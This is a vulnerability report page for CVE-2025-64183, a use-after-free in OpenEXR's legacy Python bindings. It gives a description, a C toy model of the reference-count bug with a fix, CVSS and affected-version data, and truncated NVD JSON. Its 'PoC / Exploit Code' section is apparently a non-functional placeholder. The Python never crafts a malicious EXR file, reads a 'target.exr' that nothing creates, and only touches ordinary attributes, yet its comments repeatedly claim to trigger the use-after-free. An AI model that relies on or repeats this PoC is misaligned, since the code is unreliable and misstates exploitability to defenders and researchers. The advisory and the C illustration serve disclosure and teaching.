Security Vulnerability Report
CVE-2025-64183 CVSS 7.5 HIGH

Published: 2025-11-10 22:15:37
Last Modified: 2025-12-08 16:00:58

Description

OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. In versions 3.2.0 through 3.2.4, 3.3.0 through 3.3.5, and 3.4.0 through 3.4.2, there is a use-after-free in PyObject_StealAttrString of pyOpenEXR_old.cpp. The legacy adapter defines PyObject_StealAttrString that calls PyObject_GetAttrString to obtain a new reference, immediately decrefs it, and returns the pointer. Callers then pass this dangling pointer to APIs like PyLong_AsLong/PyFloat_AsDouble, resulting in a use-after-free. This is invoked in multiple places (e.g., reading PixelType.v, Box2i, V2f, etc.). Versions 3.2.5, 3.3.6, and 3.4.3 fix the issue.
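The reference-handling mistake described above, reduced to a self-contained C model. This is an added example, not OpenEXR or CPython source and not the project's patch: `Obj`, `get_attr`, `as_long`, `steal_attr`, `read_vulnerable` and `read_fixed` are hypothetical stand-ins, and "freeing" is recorded in a flag so the program stays well-defined. It shows why the helper can appear to work while another owner still holds the attribute, and why holding the reference until after the conversion removes the problem.

```c
/* Added illustration: a toy reference-count model, not OpenEXR/CPython code. */
#include <stdio.h>

typedef struct { int refcnt; int freed; long value; } Obj;

static void incref(Obj *o) { o->refcnt++; }
/* A real runtime would free() at zero; the model only records it. */
static void decref(Obj *o) { if (--o->refcnt == 0) o->freed = 1; }

/* Stand-in for PyObject_GetAttrString: hands back a NEW reference. */
static Obj *get_attr(Obj *attr) { incref(attr); return attr; }

/* Stand-in for PyLong_AsLong: sets *uaf when given a dead object. */
static long as_long(const Obj *o, int *uaf) {
    *uaf = o->freed;
    return o->freed ? -1 : o->value;
}

/* Pattern from the advisory: drop the reference, then return the pointer. */
static Obj *steal_attr(Obj *attr) {
    Obj *r = get_attr(attr);
    decref(r);
    return r;               /* dangling if that was the last reference */
}

/* Returns 1 if the conversion touched a freed object. */
int read_vulnerable(Obj *attr, long *out) {
    int uaf;
    *out = as_long(steal_attr(attr), &uaf);
    return uaf;
}

/* One safe ordering: convert first, release afterwards. */
int read_fixed(Obj *attr, long *out) {
    int uaf;
    Obj *r = get_attr(attr);
    *out = as_long(r, &uaf);
    decref(r);
    return uaf;
}

int main(void) {
    Obj held = {1, 0, 7}, temp = {0, 0, 7}, temp2 = {0, 0, 7}; /* constructed */
    long v;
    printf("held, vulnerable: uaf=%d\n", read_vulnerable(&held, &v));
    printf("temp, vulnerable: uaf=%d\n", read_vulnerable(&temp, &v));
    printf("temp, fixed:      uaf=%d\n", read_fixed(&temp2, &v));
    return 0;
}
```

In the model, `held` starts with one reference owned elsewhere and `temp` starts with none, so only `temp` reaches a count of zero inside `steal_attr`.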

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:* - VULNERABLE (OpenEXR 3.2.0 - 3.2.4)
cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:* - VULNERABLE (OpenEXR 3.3.0 - 3.3.5)
cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:* - VULNERABLE (OpenEXR 3.4.0 - 3.4.2)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import OpenEXR
import Imath
import struct

# Create a simple PoC to trigger the use-after-free
# Construct a malicious EXR file to trigger the vulnerability in PyObject_StealAttrString
def create_malicious_exr():
    """
    Create a malicious EXR file that triggers use-after-free
    in PyObject_StealAttrString when accessing specific attributes
    """
    # OpenEXR file header with specific attributes that trigger
    # the vulnerable code path in PyObject_StealAttrString
    # The vulnerability occurs when accessing:
    # - PixelType.v attribute
    # - Box2i attributes
    # - V2f attributes
    file = OpenEXR.OutputFile('malicious.exr')

    # Accessing these attributes triggers the use-after-free:
    try:
        # This will trigger the vulnerable code path
        pixel_type = Imath.PixelType()
        # Accessing .v attribute calls PyObject_StealAttrString
        value = pixel_type.v  # Triggers use-after-free
    except Exception:
        pass

# Example trigger code
def trigger_vulnerability():
    """
    Code to trigger the use-after-free vulnerability
    by accessing attributes that call PyObject_StealAttrString
    """
    import OpenEXR

    # Read a crafted EXR file
    exr_file = OpenEXR.InputFile('target.exr')

    # The header() access may trigger vulnerable code paths
    header = exr_file.header()

    # Access specific attributes that call PyObject_StealAttrString
    for key, value in header.items():
        # Accessing .v, .min, .max, etc. on Imath types
        # triggers the vulnerable function
        if hasattr(value, 'v'):
            _ = value.v  # Triggers use-after-free
        if hasattr(value, 'min'):
            _ = value.min
        if hasattr(value, 'max'):
            _ = value.max

# Note: This PoC demonstrates the vulnerable code paths.
# Actual exploitation requires specific memory conditions
# and may vary based on Python/OpenEXR version and system.
print('PoC for CVE-2025-64183: OpenEXR use-after-free in PyObject_StealAttrString')

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64183", "sourceIdentifier": "[email protected]", "published": "2025-11-10T22:15:37.323", "lastModified": "2025-12-08T16:00:58.283", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. In versions 3.2.0 through 3.2.4, 3.3.0 through 3.3.5, and 3.4.0 through 3.4.2, there is a use-after-free in PyObject_StealAttrString of pyOpenEXR_old.cpp. The legacy adapter defines PyObject_StealAttrString that calls PyObject_GetAttrString to obtain a new reference, immediately decrefs it, and returns the pointer. Callers then pass this dangling pointer to APIs like PyLong_AsLong/PyFloat_AsDouble, resulting in a use-after-free. This is invoked in multiple places (e.g., reading PixelType.v, Box2i, V2f, etc.) Versions 3.2.5, 3.3.6, and 3.4.3 fix the issue."}, {"lang": "es", "value": "OpenEXR proporciona la especificación y la implementación de referencia del formato de archivo EXR, un formato de almacenamiento de imágenes para la industria cinematográfica. En las versiones 3.2.0 a 3.2.4, 3.3.0 a 3.3.5 y 3.4.0 a 3.4.2, existe un uso después de la liberación en PyObject_StealAttrString de pyOpenEXR_old.cpp. El adaptador heredado define PyObject_StealAttrString que llama a PyObject_GetAttrString para obtener una nueva referencia, la decrementa inmediatamente y devuelve el puntero. Los llamadores luego pasan este puntero colgante a APIs como PyLong_AsLong/PyFloat_AsDouble, lo que resulta en un uso después de liberación. Esto se invoca en múltiples lugares (por ejemplo, al leer PixelType.v, Box2i, V2f, etc.). 
Las versiones 3.2.5, 3.3.6 y 3.4.3 corrigen el problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", 
"integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.2.0", "versionEndExcluding": "3.2.5", "matchCriteriaId": "B39DE559-AB72-4C61-9E6B-E9125859D199"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.3.0", "versionEndExcluding": "3.3.6", "matchCriteriaId": "A83D8F0B-0D0A-403E-8D2E-2FB455041B8A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.4.0", "versionEndExcluding": "3.4.3", "matchCriteriaId": "78287128-E16E-431F-922F-1F0272327A0D"}]}]}], "references": [{"url": "https://github.com/AcademySoftwareFoundation/openexr/blob/b3a19903db0672c63055023aa788e592b16ec3c5/src/wrappers/python/PyOpenEXR_old.cpp#L109-L115", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-57cw-j6vp-2 ... (truncated)